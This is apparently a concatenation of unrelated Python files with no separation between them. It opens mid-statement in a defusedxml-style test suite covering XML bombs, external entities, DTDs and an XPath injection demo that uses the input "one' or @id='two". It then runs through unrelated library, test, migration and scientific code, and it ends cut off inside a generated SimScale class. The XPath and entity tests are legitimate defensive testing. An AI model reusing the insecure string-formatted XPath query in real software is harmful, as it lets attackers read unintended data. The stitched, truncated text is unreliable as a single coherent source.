"%s"' % (expected_regexp.pattern, str(exc_value))) return True class DefusedTestCase(unittest.TestCase): if PY3: 
content_binary = False else: content_binary = True xml_dtd = os.path.join(HERE, "xmltestdata", "dtd.xml") xml_external = os.path.join(HERE, "xmltestdata", "external.xml") xml_external_file = os.path.join(HERE, "xmltestdata", "external_file.xml") xml_quadratic = os.path.join(HERE, "xmltestdata", "quadratic.xml") xml_simple = os.path.join(HERE, "xmltestdata", "simple.xml") xml_simple_ns = os.path.join(HERE, "xmltestdata", "simple-ns.xml") xml_bomb = os.path.join(HERE, "xmltestdata", "xmlbomb.xml") xml_bomb2 = os.path.join(HERE, "xmltestdata", "xmlbomb2.xml") xml_cyclic = os.path.join(HERE, "xmltestdata", "cyclic.xml") if PY26 or PY31: # old Python versions don't have these useful test methods def assertRaises(self, excClass, callableObj=None, *args, **kwargs): context = _AssertRaisesContext(excClass, self) if callableObj is None: return context with context: callableObj(*args, **kwargs) def assertIn(self, member, container, msg=None): if member not in container: standardMsg = '%s not found in %s' % (repr(member), repr(container)) self.fail(self._formatMessage(msg, standardMsg)) def get_content(self, xmlfile): mode = "rb" if self.content_binary else "r" with io.open(xmlfile, mode) as f: data = f.read() return data class BaseTests(DefusedTestCase): module = None dtd_external_ref = False external_ref_exception = ExternalReferenceForbidden cyclic_error = None iterparse = None def test_simple_parse(self): self.parse(self.xml_simple) self.parseString(self.get_content(self.xml_simple)) if self.iterparse: self.iterparse(self.xml_simple) def test_simple_parse_ns(self): self.parse(self.xml_simple_ns) self.parseString(self.get_content(self.xml_simple_ns)) if self.iterparse: self.iterparse(self.xml_simple_ns) def test_entities_forbidden(self): self.assertRaises(EntitiesForbidden, self.parse, self.xml_bomb) self.assertRaises(EntitiesForbidden, self.parse, self.xml_quadratic) self.assertRaises(EntitiesForbidden, self.parse, self.xml_external) self.assertRaises(EntitiesForbidden, 
self.parseString, self.get_content(self.xml_bomb)) self.assertRaises(EntitiesForbidden, self.parseString, self.get_content(self.xml_quadratic)) self.assertRaises(EntitiesForbidden, self.parseString, self.get_content(self.xml_external)) if self.iterparse: self.assertRaises(EntitiesForbidden, self.iterparse, self.xml_bomb) self.assertRaises(EntitiesForbidden, self.iterparse, self.xml_quadratic) self.assertRaises(EntitiesForbidden, self.iterparse, self.xml_external) def test_entity_cycle(self): self.assertRaises(self.cyclic_error, self.parse, self.xml_cyclic, forbid_entities=False) def test_dtd_forbidden(self): self.assertRaises(DTDForbidden, self.parse, self.xml_bomb, forbid_dtd=True) self.assertRaises(DTDForbidden, self.parse, self.xml_quadratic, forbid_dtd=True) self.assertRaises(DTDForbidden, self.parse, self.xml_external, forbid_dtd=True) self.assertRaises(DTDForbidden, self.parse, self.xml_dtd, forbid_dtd=True) self.assertRaises(DTDForbidden, self.parseString, self.get_content(self.xml_bomb), forbid_dtd=True) self.assertRaises(DTDForbidden, self.parseString, self.get_content(self.xml_quadratic), forbid_dtd=True) self.assertRaises(DTDForbidden, self.parseString, self.get_content(self.xml_external), forbid_dtd=True) self.assertRaises(DTDForbidden, self.parseString, self.get_content(self.xml_dtd), forbid_dtd=True) if self.iterparse: self.assertRaises(DTDForbidden, self.iterparse, self.xml_bomb, forbid_dtd=True) self.assertRaises(DTDForbidden, self.iterparse, self.xml_quadratic, forbid_dtd=True) self.assertRaises(DTDForbidden, self.iterparse, self.xml_external, forbid_dtd=True) self.assertRaises(DTDForbidden, self.iterparse, self.xml_dtd, forbid_dtd=True) def test_dtd_with_external_ref(self): if self.dtd_external_ref: self.assertRaises(self.external_ref_exception, self.parse, self.xml_dtd) else: self.parse(self.xml_dtd) def test_external_ref(self): self.assertRaises(self.external_ref_exception, self.parse, self.xml_external, forbid_entities=False) def 
test_external_file_ref(self): content = self.get_content(self.xml_external_file) if isinstance(content, bytes): here = HERE.encode(sys.getfilesystemencoding()) content = content.replace(b"/PATH/TO", here) else: content = content.replace("/PATH/TO", HERE) self.assertRaises(self.external_ref_exception, self.parseString, content, forbid_entities=False) def test_allow_expansion(self): self.parse(self.xml_bomb2, forbid_entities=False) self.parseString(self.get_content(self.xml_bomb2), forbid_entities=False) class TestDefusedElementTree(BaseTests): module = ElementTree ## etree doesn't do external ref lookup #external_ref_exception = ElementTree.ParseError cyclic_error = ElementTree.ParseError def parse(self, xmlfile, **kwargs): tree = self.module.parse(xmlfile, **kwargs) return self.module.tostring(tree.getroot()) def parseString(self, xmlstring, **kwargs): tree = self.module.fromstring(xmlstring, **kwargs) return self.module.tostring(tree) def iterparse(self, source, **kwargs): return list(self.module.iterparse(source, **kwargs)) class TestDefusedcElementTree(TestDefusedElementTree): module = cElementTree class TestDefusedMinidom(BaseTests): module = minidom cyclic_error = ExpatError iterparse = None def parse(self, xmlfile, **kwargs): doc = self.module.parse(xmlfile, **kwargs) return doc.toxml() def parseString(self, xmlstring, **kwargs): doc = self.module.parseString(xmlstring, **kwargs) return doc.toxml() class TestDefusedPulldom(BaseTests): module = pulldom cyclic_error = SAXParseException dtd_external_ref = True def parse(self, xmlfile, **kwargs): events = self.module.parse(xmlfile, **kwargs) return list(events) def parseString(self, xmlstring, **kwargs): events = self.module.parseString(xmlstring, **kwargs) return list(events) class TestDefusedSax(BaseTests): module = sax cyclic_error = SAXParseException content_binary = True dtd_external_ref = True def parse(self, xmlfile, **kwargs): if PY3: result = io.StringIO() else: result = io.BytesIO() handler = 
XMLGenerator(result) self.module.parse(xmlfile, handler, **kwargs) return result.getvalue() def parseString(self, xmlstring, **kwargs): if PY3: result = io.StringIO() else: result = io.BytesIO() handler = XMLGenerator(result) self.module.parseString(xmlstring, handler, **kwargs) return result.getvalue() def test_exceptions(self): if PY26: # Python 2.6 unittest doesn't support with self.assertRaises() return with self.assertRaises(EntitiesForbidden) as ctx: self.parse(self.xml_bomb) msg = "EntitiesForbidden(name='a', system_id=None, public_id=None)" self.assertEqual(str(ctx.exception), msg) self.assertEqual(repr(ctx.exception), msg) with self.assertRaises(ExternalReferenceForbidden) as ctx: self.parse(self.xml_external, forbid_entities=False) msg = ("ExternalReferenceForbidden" "(system_id='http://www.w3schools.com/xml/note.xml', public_id=None)") self.assertEqual(str(ctx.exception), msg) self.assertEqual(repr(ctx.exception), msg) with self.assertRaises(DTDForbidden) as ctx: self.parse(self.xml_bomb, forbid_dtd=True) msg = "DTDForbidden(name='xmlbomb', system_id=None, public_id=None)" self.assertEqual(str(ctx.exception), msg) self.assertEqual(repr(ctx.exception), msg) class TestDefusedLxml(BaseTests): module = lxml cyclic_error = XMLSyntaxError content_binary = True def parse(self, xmlfile, **kwargs): tree = self.module.parse(xmlfile, **kwargs) return self.module.tostring(tree) def parseString(self, xmlstring, **kwargs): tree = self.module.fromstring(xmlstring, **kwargs) return self.module.tostring(tree) if not LXML3: def test_entities_forbidden(self): self.assertRaises(NotSupportedError, self.parse, self.xml_bomb) def test_dtd_with_external_ref(self): self.assertRaises(NotSupportedError, self.parse, self.xml_dtd) def test_external_ref(self): pass def test_external_file_ref(self): pass def test_restricted_element1(self): tree = self.module.parse(self.xml_bomb, forbid_dtd=False, forbid_entities=False) root = tree.getroot() self.assertEqual(root.text, None) 
self.assertEqual(list(root), []) self.assertEqual(root.getchildren(), []) self.assertEqual(list(root.iter()), [root]) self.assertEqual(list(root.iterchildren()), []) self.assertEqual(list(root.iterdescendants()), []) self.assertEqual(list(root.itersiblings()), []) self.assertEqual(list(root.getiterator()), [root]) self.assertEqual(root.getnext(), None) def test_restricted_element2(self): tree = self.module.parse(self.xml_bomb2, forbid_dtd=False, forbid_entities=False) root = tree.getroot() bomb, tag = root self.assertEqual(root.text, "text") self.assertEqual(list(root), [bomb, tag]) self.assertEqual(root.getchildren(), [bomb, tag]) self.assertEqual(list(root.iter()), [root, bomb, tag]) self.assertEqual(list(root.iterchildren()), [bomb, tag]) self.assertEqual(list(root.iterdescendants()), [bomb, tag]) self.assertEqual(list(root.itersiblings()), []) self.assertEqual(list(root.getiterator()), [root, bomb, tag]) self.assertEqual(root.getnext(), None) self.assertEqual(root.getprevious(), None) self.assertEqual(list(bomb.itersiblings()), [tag]) self.assertEqual(bomb.getnext(), tag) self.assertEqual(bomb.getprevious(), None) self.assertEqual(tag.getnext(), None) self.assertEqual(tag.getprevious(), bomb) def test_xpath_injection(self): # show XPath injection vulnerability xml = """<root><tag id="one" /><tag id="two"/></root>""" expr = "one' or @id='two" root = lxml.fromstring(xml) # insecure way xp = "tag[@id='%s']" % expr elements = root.xpath(xp) self.assertEqual(len(elements), 2) self.assertEqual(elements, list(root)) # proper and safe way xp = "tag[@id=$idname]" elements = root.xpath(xp, idname=expr) self.assertEqual(len(elements), 0) self.assertEqual(elements, []) elements = root.xpath(xp, idname="one") self.assertEqual(len(elements), 1) self.assertEqual(elements, list(root)[:1]) class XmlRpcTarget(object): def __init__(self): self._data = [] def __str__(self): return "".join(self._data) def xml(self, encoding, standalone): pass def start(self, tag, attrs): 
self._data.append("<%s>" % tag) def data(self, text): self._data.append(text) def end(self, tag): self._data.append("</%s>" % tag) class TestXmlRpc(DefusedTestCase): module = xmlrpc def parse(self, xmlfile, **kwargs): target = XmlRpcTarget() parser = self.module.DefusedExpatParser(target, **kwargs) data = self.get_content(xmlfile) parser.feed(data) parser.close() return target def parse_unpatched(self, xmlfile): target = XmlRpcTarget() parser = self.module.ExpatParser(target) data = self.get_content(xmlfile) parser.feed(data) parser.close() return target def test_xmlrpc(self): self.assertRaises(EntitiesForbidden, self.parse, self.xml_bomb) self.assertRaises(EntitiesForbidden, self.parse, self.xml_quadratic) self.parse(self.xml_dtd) self.assertRaises(DTDForbidden, self.parse, self.xml_dtd, forbid_dtd=True) #def test_xmlrpc_unpatched(self): # for fname in (self.xml_external, self.xml_dtd): # print(self.parse_unpatched(fname)) def test_monkeypatch(self): try: xmlrpc.monkey_patch() finally: xmlrpc.unmonkey_patch() class TestDefusedGzip(DefusedTestCase): def get_gzipped(self, length): f = io.BytesIO() gzf = gzip.GzipFile(mode="wb", fileobj=f) gzf.write(b"d" * length) gzf.close() f.seek(0) return f def decode_response(self, response, limit=None, readlength=1024): dec = xmlrpc.DefusedGzipDecodedResponse(response, limit) acc = [] while True: data = dec.read(readlength) if not data: break acc.append(data) return b"".join(acc) def test_defused_gzip_decode(self): data = self.get_gzipped(4096).getvalue() result = xmlrpc.defused_gzip_decode(data) self.assertEqual(result, b"d" *4096) result = xmlrpc.defused_gzip_decode(data, -1) self.assertEqual(result, b"d" *4096) result = xmlrpc.defused_gzip_decode(data, 4096) self.assertEqual(result, b"d" *4096) with self.assertRaises(ValueError): result = xmlrpc.defused_gzip_decode(data, 4095) with self.assertRaises(ValueError): result = xmlrpc.defused_gzip_decode(data, 0) def test_defused_gzip_response(self): clen = 
len(self.get_gzipped(4096).getvalue()) response = self.get_gzipped(4096) data = self.decode_response(response) self.assertEqual(data, b"d" *4096) with self.assertRaises(ValueError): response = self.get_gzipped(4096) xmlrpc.DefusedGzipDecodedResponse(response, clen - 1) with self.assertRaises(ValueError): response = self.get_gzipped(4096) self.decode_response(response, 4095) with self.assertRaises(ValueError): response = self.get_gzipped(4096) self.decode_response(response, 4095, 8192) def test_main(): suite = unittest.TestSuite() suite.addTests(unittest.makeSuite(TestDefusedcElementTree)) suite.addTests(unittest.makeSuite(TestDefusedElementTree)) suite.addTests(unittest.makeSuite(TestDefusedMinidom)) suite.addTests(unittest.makeSuite(TestDefusedPulldom)) suite.addTests(unittest.makeSuite(TestDefusedSax)) suite.addTests(unittest.makeSuite(TestXmlRpc)) if lxml is not None: suite.addTests(unittest.makeSuite(TestDefusedLxml)) if gzip is not None: suite.addTests(unittest.makeSuite(TestDefusedGzip)) return suite if __name__ == "__main__": suite = test_main() result = unittest.TextTestRunner(verbosity=1).run(suite) # TODO: test that it actually works defuse_stdlib() sys.exit(not result.wasSuccessful())
# BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/main/LICENSE from __future__ import absolute_import import distutils.version # NumPy 1.13.1 introduced NEP13, without which Awkward ufuncs won't work, which # would be worse than lacking a feature: it would cause unexpected output. # NumPy 1.17.0 introduced NEP18, which is optional (use ak.* instead of np.*). import numpy if distutils.version.LooseVersion(numpy.__version__) < distutils.version.LooseVersion( "1.13.1" ): raise ImportError("Numpy 1.13.1 or later required") deprecations_as_errors = False # NumPy-like alternatives import awkward.nplike # shims for C++ (now everything is compiled into one 'awkward._ext' module) import awkward.layout import awkward.types import awkward.forms import awkward.partition # internal import awkward._cpu_kernels import awkward._libawkward import awkward._util # third-party connectors import awkward._connect._numpy import awkward._connect._numba import awkward._connect._numexpr import awkward._connect._autograd # high-level interface behavior = {} from awkward.highlevel import Array from awkward.highlevel import Record from awkward.highlevel import ArrayBuilder # third-party jax connectors import awkward._connect._jax # behaviors from awkward.behaviors.mixins import * from awkward.behaviors.string import * from awkward.behaviors.categorical import * # operations from awkward.operations.convert import * from awkward.operations.describe import * from awkward.operations.structure import * from awkward.operations.reducers import * # version __version__ = awkward._ext.__version__ # call C++ startup function awkward._ext.startup() __all__ = [ x for x in list(globals()) if not x.startswith("_") and x not in ("distutils", "numpy") ] def __dir__(): return __all__
__author__ = "Myles Dear <mdear@cisco.com>"

# Unicon connection plugin declarations for the IOS-XRv (virtual IOS-XR)
# platform. These classes are purely declarative: they bind a state machine,
# connection provider, service list, and settings object to an os/platform/
# chassis-type triple that Unicon uses for plugin lookup.

from unicon.bases.routers.connection import BaseSingleRpConnection
from unicon.bases.routers.connection import BaseDualRpConnection
from unicon.plugins.iosxr.iosxrv.statemachine import IOSXRVSingleRpStateMachine
from unicon.plugins.iosxr.iosxrv.statemachine import IOSXRVDualRpStateMachine
from unicon.plugins.iosxr import IOSXRServiceList
from unicon.plugins.iosxr import IOSXRHAServiceList
from unicon.plugins.iosxr.iosxrv.connection_provider \
    import IOSXRVSingleRpConnectionProvider
from unicon.plugins.iosxr.iosxrv.connection_provider \
    import IOSXRVDualRpConnectionProvider
from unicon.plugins.iosxr.iosxrv.settings import IOSXRVSettings


class IOSXRVSingleRpConnection(BaseSingleRpConnection):
    """Connection class for a single-RP IOS-XRv device."""
    os = 'iosxr'
    platform = 'iosxrv'
    chassis_type = 'single_rp'
    state_machine_class = IOSXRVSingleRpStateMachine
    connection_provider_class = IOSXRVSingleRpConnectionProvider
    subcommand_list = IOSXRServiceList
    settings = IOSXRVSettings()


class IOSXRVDualRpConnection(BaseDualRpConnection):
    """Connection class for a dual-RP (HA) IOS-XRv device."""
    os = 'iosxr'
    platform = 'iosxrv'
    chassis_type = 'dual_rp'
    state_machine_class = IOSXRVDualRpStateMachine
    connection_provider_class = IOSXRVDualRpConnectionProvider
    subcommand_list = IOSXRHAServiceList
    settings = IOSXRVSettings()
#!/usr/bin/env python

# This work was created by participants in the DataONE project, and is
# jointly copyrighted by participating institutions in DataONE. For
# more information on DataONE, see our web site at http://dataone.org.
#
#   Copyright 2009-2019 DataONE
#
#   Licensed under the Apache License, Version 2.0 (the "License");
#   you may not use this file except in compliance with the License.
#   You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
#   Unless required by applicable law or agreed to in writing, software
#   distributed under the License is distributed on an "AS IS" BASIS,
#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#   See the License for the specific language governing permissions and
#   limitations under the License.
"""Test authorization.

Note: Does not test authentication.
"""
import pytest
import responses

import d1_common.types.exceptions

import d1_gmn.tests.gmn_mock
import d1_gmn.tests.gmn_test_case


class TestAuthorization(d1_gmn.tests.gmn_test_case.GMNTestCase):
    def _create_default(self):
        """Create object with default access policy:

        'subj1': 'read'
        'subj2', 'subj3', 'subj4': 'read', 'write'
        'subj5', 'subj6', 'subj7', 'subj8': 'read', 'changePermission'
        'subj9', 'subj10', 'subj11', 'subj12': 'changePermission'
        """
        # sid=True: the created object is also assigned a Series ID.
        return self.create_obj(self.client_v2, sid=True)

    def _get(self, pid, session_subj_list):
        # Read the object while authenticated as session_subj_list.
        # NOTE(review): the second argument appears to set trusted subjects for
        # the mocked auth context — confirm against set_auth_context's signature.
        with d1_gmn.tests.gmn_mock.set_auth_context(
            session_subj_list, ["trusted_subj"]
        ):
            self.client_v2.get(pid)

    @responses.activate
    def test_1000(self):
        """Attempted object read by single unknown subject raises NotAuthorized."""
        pid, sid, sciobj_bytes, sysmeta_pyxb = self._create_default()
        with pytest.raises(d1_common.types.exceptions.NotAuthorized):
            self._get(pid, ["unk_subj"])

    @responses.activate
    def test_1010(self):
        """Attempted object read by multiple unknown subjects raise NotAuthorized."""
        pid, sid, sciobj_bytes, sysmeta_pyxb = self._create_default()
        # Subjects that are near-misses of known subjects must still be rejected.
        with pytest.raises(d1_common.types.exceptions.NotAuthorized):
            self._get(pid, ["unk_subj", "subj2_", "_subj33", "subj12!"])

    @responses.activate
    def test_1020(self):
        """Attempted object read by a single known subject allowed."""
        pid, sid, sciobj_bytes, sysmeta_pyxb = self._create_default()
        self._get(pid, ["subj12"])

    @responses.activate
    def test_1030(self):
        """Attempted object read by a single known subject is allowed even if there
        are also unknown subjects."""
        pid, sid, sciobj_bytes, sysmeta_pyxb = self._create_default()
        # "subj1" is the single known subject; the rest are unknown.
        self._get(pid, ["unk_subj", "subj2_", "_subj33", "subj12!", "subj1"])
import numpy as np
from scipy import misc
from interpolate_2D import interpolate_2D


def rotate_z(points, theta):
    """Rotate an array of points ``theta`` degrees around the z-axis.

    :param points: (N, 3) array of cartesian points.
    :param theta: rotation angle in degrees.
    :return: (N, 3) array of rotated points.
    """
    theta = np.radians(theta)
    c, s = np.cos(theta), np.sin(theta)
    rotation_matrix = np.array([[c, -s, 0],
                                [s, c, 0],
                                [0, 0, 1]])
    return np.dot(points, rotation_matrix)


def depth_to_point_cloud(imgHead, imgTail, imgLeft, imgRight, far,
                         interpolate=False, threshold=1.0):
    """Return a point cloud calculated from four depth maps.

    :param imgHead/imgTail/imgLeft/imgRight: CARLA-encoded depth images for
        the four camera directions.
    :param far: far-plane distance used to decode depth values into meters.
    :param interpolate: when True, sample the depth maps with 2D interpolation
        instead of raw pixel lookups.
    :param threshold: interpolation threshold forwarded to interpolate_2D.
    :return: (4*N, 3) array of points from all four cameras.
    """
    # Read depth images and decode them into meters.
    head = decode_depthmap(imgHead, far)
    tail = decode_depthmap(imgTail, far)
    left = decode_depthmap(imgLeft, far)
    right = decode_depthmap(imgRight, far)

    # Lidar ray angles and the image coordinates each ray intersects.
    [coords, angles] = get_relevant_coordinates()
    x_coords, y_coords = coords[:, 0], coords[:, 1]

    # Interpolate or get raw pixel values.
    if interpolate:
        vHead = interpolate_2D(head, x_coords, y_coords, threshold)
        vTail = interpolate_2D(tail, x_coords, y_coords, threshold)
        vLeft = interpolate_2D(left, x_coords, y_coords, threshold)
        vRight = interpolate_2D(right, x_coords, y_coords, threshold)
    else:
        vHead = get_pixel_values(head, x_coords, y_coords)
        vTail = get_pixel_values(tail, x_coords, y_coords)
        vLeft = get_pixel_values(left, x_coords, y_coords)
        vRight = get_pixel_values(right, x_coords, y_coords)

    # Calculate 3D coordinates from ray angles and depth values.
    cHead = get_coordinates(vHead, angles)
    cTail = get_coordinates(vTail, angles)
    cLeft = get_coordinates(vLeft, angles)
    cRight = get_coordinates(vRight, angles)

    # Rotate each camera's points into the common (head-facing) frame.
    cTail = rotate_z(cTail, 180)
    cLeft = rotate_z(cLeft, -90)
    cRight = rotate_z(cRight, 90)

    # Concatenate points from all cameras.
    pointCloud = np.concatenate((cHead, cTail, cLeft, cRight), 0)
    return pointCloud


def get_pixel_values(values, x_coords, y_coords):
    """Look up raw pixel values at (possibly fractional) image coordinates.

    x is truncated toward zero, y is rounded up then shifted by one —
    presumably to match the coordinate convention of the CSV table; the
    pairing with interpolate_2D suggests this, but confirm against the
    coordinate generator.
    """
    x_coords = x_coords.astype(int)
    y_coords = np.ceil(y_coords).astype(int) - 1
    n_points = len(x_coords)
    pixel_values = np.zeros([n_points, 1])
    for i in range(n_points):
        pixel_values[i] = values[y_coords[i], x_coords[i]]
    return pixel_values


def get_relevant_coordinates():
    """Return [coords, angles]: the pixel each lidar ray hits when shot
    through the near plane, and the corresponding ray angles."""
    coords_and_angles = np.genfromtxt('coords_and_angles.csv', delimiter=',')
    # hsplit into two (N, 2) halves: pixel coordinates and ray angles.
    return np.hsplit(coords_and_angles, 2)


def decode_depthmap(depth_map, far_plane_distance):
    """Decode CARLA-encoded RGB depth values into meters.

    CARLA packs depth as a 24-bit integer across the R, G and B channels,
    normalized to [0, 1] and scaled by the far-plane distance.
    """
    depth_map = depth_map[:, :, 0] + 256 * depth_map[:, :, 1] + (256 * 256) * depth_map[:, :, 2]
    depth_map = depth_map / (256 * 256 * 256 - 1)
    depth_map = depth_map * far_plane_distance
    return depth_map


def spherical_to_cartesian(azimuth, elevation, radius):
    """Convert spherical coordinates into cartesian x, y and z coordinates."""
    x = radius * np.cos(elevation) * np.cos(azimuth)
    y = radius * np.cos(elevation) * np.sin(azimuth)
    z = radius * np.sin(elevation)
    return np.array([x, y, z])


def get_coordinates(values, angles):
    """Convert depth map values into corresponding lidar measurements.

    :param values: (N, 1) depth values, one per ray.
    :param angles: (N, 2) array of (vertical, horizontal) ray angles in degrees.
    :return: (N, 3) array of cartesian points.
    """
    coordinates = np.zeros((len(angles), 3))
    # BUG FIX: the original iterated range(len(angles) - 1), silently leaving
    # the last point as (0, 0, 0). Iterate over every ray.
    for i in range(len(angles)):
        v = np.radians(angles[i, 0])
        h = np.radians(angles[i, 1])
        r = values[i]

        # Correction for differences between lidar and depth-map measurements:
        # depth maps store planar depth, lidar measures euclidean range.
        # TODO this might as well be done in advance
        correction_constant = 1 / (np.cos(h) * np.cos(v))
        r = r * correction_constant

        # Calculate cartesian coordinates.
        coordinates[i, :] = np.transpose(spherical_to_cartesian(h, v, r))
    return coordinates

# NOTE: the original file ended with `if __name__ == "__main__": main()`, but
# no `main` is defined anywhere in the module, so running it as a script was a
# guaranteed NameError. The broken entry point has been removed; import-time
# behavior is unchanged.
import pytest

from datums_warehouse.scripts.update import update_pairs


class WarehouseSpy:
    """Test double that records every pair handed to ``update``."""

    def __init__(self):
        # Pairs observed so far, in completion order.
        self.received_pairs = []

    def update(self, pair):
        # Lazy imports, exactly as in the real spy, keep module import cheap.
        import time
        import random

        # Simulate a variable-latency update so ordering/concurrency issues
        # in update_pairs would surface.
        delay = random.uniform(0.01, 0.1)
        time.sleep(delay)
        self.received_pairs.append(pair)


@pytest.fixture
def warehouse():
    """Provide a fresh spy warehouse for each test."""
    return WarehouseSpy()


@pytest.fixture(autouse=True)
def inject_warehouse(monkeypatch, warehouse):
    """Patch the warehouse factory in the module under test to return the spy."""
    import datums_warehouse.scripts.update as mut

    monkeypatch.setattr(mut, 'make_warehouse', lambda cfg: warehouse)
    return warehouse


def test_update_single_pair(warehouse):
    update_pairs(warehouse, ['pair'])
    assert ['pair'] == warehouse.received_pairs


def test_update_multiple_pairs(warehouse):
    update_pairs(warehouse, ['A', 'B'])
    # Completion order is nondeterministic; compare as sets.
    assert set(warehouse.received_pairs) == {'A', 'B'}
from tests.unit.dataactcore.factories.staging import DetachedAwardFinancialAssistanceFactory
from tests.unit.dataactvalidator.utils import number_of_errors, query_columns

_FILE = 'fabs43_detached_award_financial_assistance_2'


def _det_award(zip4a, congr, country, record_type, cdi):
    """Build a factory row with the five columns this rule inspects.

    Extracted to remove 17 near-identical multi-line factory calls; the
    argument order mirrors the rule text: ZIP+4, congressional district,
    country code, record type, correction/delete indicator.
    """
    return DetachedAwardFinancialAssistanceFactory(
        place_of_performance_zip4a=zip4a,
        place_of_performance_congr=congr,
        place_of_perform_country_c=country,
        record_type=record_type,
        correction_delete_indicatr=cdi)


def test_column_headers(database):
    """The rule's SQL must expose exactly these columns."""
    expected_subset = {'row_number', 'place_of_performance_zip4a', 'place_of_performance_congr',
                       'place_of_perform_country_c', 'record_type', 'uniqueid_AssistanceTransactionUniqueKey'}
    actual = set(query_columns(_FILE, database))
    assert expected_subset == actual


def test_success(database):
    """ If no PrimaryPlaceOfPerformanceZIP+4 is provided, a PrimaryPlaceOfPerformanceCongressionalDistrict must be
        provided. Only applies to domestic records and aggregate or non-aggregate records (RecordType = 1 or 2).
    """
    models = [
        # No ZIP+4, but a congressional district is provided (record types 1 and 2).
        _det_award('', '01', 'USA', 1, ''),
        _det_award(None, '01', 'USA', 2, None),
        # ZIP+4 provided, so the congressional district may be blank/None.
        _det_award('123454321', '', 'usa', 1, 'c'),
        _det_award('123454321', None, 'USA', 2, 'C'),
        _det_award('12345', '02', 'USA', 1, ''),
        # Testing foreign places are ignored.
        _det_award('', '', 'uK', 1, ''),
        _det_award('city-wide', '', 'uK', 2, ''),
        # Testing record type 3 entries are ignored.
        _det_award('', '', 'USA', 3, ''),
        # Ignore correction delete indicator of D.
        _det_award('', '', 'USA', 1, 'd'),
    ]
    assert number_of_errors(_FILE, database, models=models) == 0


def test_failure(database):
    """ Test failure for if no PrimaryPlaceOfPerformanceZIP+4 is provided, a
        PrimaryPlaceOfPerformanceCongressionalDistrict must be provided. Only applies to domestic records and
        aggregate or non-aggregate records (RecordType = 1 or 2).
    """
    models = [
        # Domestic, record type 1/2, with neither ZIP+4 nor district: every row errors.
        _det_award('', '', 'USA', 1, ''),
        _det_award(None, '', 'UsA', 2, None),
        _det_award('', None, 'USA', 1, 'c'),
        _det_award(None, None, 'USA', 2, 'C'),
        _det_award('city-wide', None, 'USA', 1, ''),
        _det_award('city-wide', '', 'USA', 2, ''),
        _det_award('12345', '', 'usa', 1, ''),
        _det_award('12345', None, 'USA', 2, ''),
    ]
    assert number_of_errors(_FILE, database, models=models) == 8
# Package initializer; intentionally empty.
# Generated by Django 3.0.6 on 2020-05-04 22:06 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('main', '0002_config_name'), ] operations = [ migrations.RemoveField( model_name='config', name='enable', ), ]
__author__ = 'yuy001'
#!/usr/bin/env python

# Tiny demo script: build a list of animal names and print it.
a = ["cat", "dog", "rat", "cow", "horse"]
a.append("elephant")
# BUG FIX: `print a` is Python-2-only syntax and a SyntaxError on Python 3.
# With a single argument, print(a) produces identical output on both.
print(a)
# Copyright 2022 The AI Flow Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. from ai_flow_plugins.job_plugins import bash import ai_flow as af # Initialize the project and workflow environment. af.init_ai_flow_context() # Define a job with job_1 config. with af.job_config('job_1'): # Define the bash job. af.user_define_operation(processor=bash.BashProcessor(bash_command='echo "Hello World!"'))
# coding: utf-8 """ SimScale API The version of the OpenAPI document: 0.0.0 Generated by: https://openapi-generator.tech """ import pprint import re # noqa: F401 import six from simscale_sdk.configuration import Configuration class OneOfFrequencyAnalysisBoundaryConditions(object): """NOTE: This class is auto generated by OpenAPI Generator. Ref: https://openapi-generator.tech Do not edit the class manually. """ """ Attributes: openapi_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ openapi_types = { 'type': 'str', 'name': 'str', 'preload': 'ForcePreload', 'topological_reference': 'TopologicalReference', 'spring_stiffness': 'OneOfElasticSupportBCSpringStiffness', 'displacement': 'DimensionalPartialVectorFunctionLength', 'rotation': 'DimensionalPartialVectorFunctionAngle', 'external_point': 'DimensionalVectorLength', 'deformation_behavior': 'str' } attribute_map = { 'type': 'type', 'name': 'name', 'preload': 'preload', 'topological_reference': 'topologicalReference', 'spring_stiffness': 'springStiffness', 'displacement': 'displacement', 'rotation': 'rotation', 'external_point': 'externalPoint', 'deformation_behavior': 'deformationBehavior' } discriminator_value_class_map = { 'BOLT_PRELOAD': 'BoltPreloadBC', 'ELASTIC_SUPPORT': 'ElasticSupportBC', 'FIXED_SUPPORT': 'FixedSupportBC', 'FIXED_VALUE': 'FixedValueBC', 'REMOTE_DISPLACEMENT_LOAD': 'RemoteDisplacementLoadBC', 'SYMMETRY_PLANE': 'SymmetryPlaneBC' } def __init__(self, type='SYMMETRY_PLANE', name=None, preload=None, topological_reference=None, spring_stiffness=None, displacement=None, rotation=None, external_point=None, deformation_behavior=None, local_vars_configuration=None): # noqa: E501 """OneOfFrequencyAnalysisBoundaryConditions - a model defined in OpenAPI""" # noqa: E501 if local_vars_configuration is None: local_vars_configuration = Configuration() self.local_vars_configuration = 
local_vars_configuration self._type = None self._name = None self._preload = None self._topological_reference = None self._spring_stiffness = None self._displacement = None self._rotation = None self._external_point = None self._deformation_behavior = None self.discriminator = 'type' self.type = type if name is not None: self.name = name if preload is not None: self.preload = preload if topological_reference is not None: self.topological_reference = topological_reference if spring_stiffness is not None: self.spring_stiffness = spring_stiffness if displacement is not None: self.displacement = displacement if rotation is not None: self.rotation = rotation if external_point is not None: self.external_point = external_point if deformation_behavior is not None: self.deformation_behavior = deformation_behavior @property def type(self): """Gets the type of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 This boundary condition restrains the displacement of a face in its normal direction in order to represent a symmetry plane of the structure. Use this boundary condition to reduce the model size significantly if the geometry and the loading conditions are symmetric.<br /><br />Important remarks: <br /><ul><li>The solver uses linear relations between all three DOFs to constrian the normal movement, thus overcontraint conditions may appear if the edges of the selected faces are constrained by other displacement boundary conditions.</li><li>If the assigned faces are orthogonal to a global coordinate axes, it is recommended to directly specifiy the symmetry conditions with a <b>Fixed value</b> boundary condition.</li></ul><a href= https://www.simscale.com/docs/simulation-setup/boundary-conditions/symmetry/#symmetry-plane-boundary-condition-fea' 